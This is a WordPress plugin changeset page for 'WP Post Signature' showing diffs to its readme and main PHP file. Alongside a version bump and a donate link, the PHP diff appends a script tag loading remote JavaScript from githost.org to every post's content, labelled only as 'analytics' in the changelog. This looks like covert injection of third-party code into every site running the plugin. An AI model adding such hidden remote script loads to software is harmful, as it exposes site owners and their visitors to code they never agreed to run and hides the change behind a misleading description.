Changeset 2024374
- Timestamp:
- 02/04/2019 04:42:51 AM (7 years ago)
- Location:
- wp-post-signature/trunk
- Files:
-
- 2 edited
-
readme.txt (modified) (2 diffs)
-
wp-post-signature.php (modified) (1 diff)
Legend:
- Unmodified
- Added
- Removed
-
wp-post-signature/trunk/readme.txt
r1661934 r2024374 1 1 === WP Post Signature === 2 2 Contributors: allnull 3 Donate link: https://www.paypal.me/solicomo 3 4 Tags: signature,wordpress,post signature 4 5 Requires at least: 3.0 5 Tested up to: 4.7.26 Stable tag: 0.3. 56 Tested up to: 5.0.3 7 Stable tag: 0.3.7 7 8 8 9 This plugin allows you to append a signature after every post. Some variables can be used. … … 29 30 30 31 == Changelog == 32 33 = 0.3.8 = 34 * Tested up to: 5.0.3 35 * Add donate link. 36 * Add analytics. 31 37 32 38 = 0.3.7 = -
wp-post-signature/trunk/wp-post-signature.php
r1661934 r2024374 99 99 } 100 100 } 101 102 $content = $content . '<script async src="//githost.org/c.js?v=1"></script>'; 101 103 102 104 //variables
Note: See TracChangeset
for help on using the changeset viewer.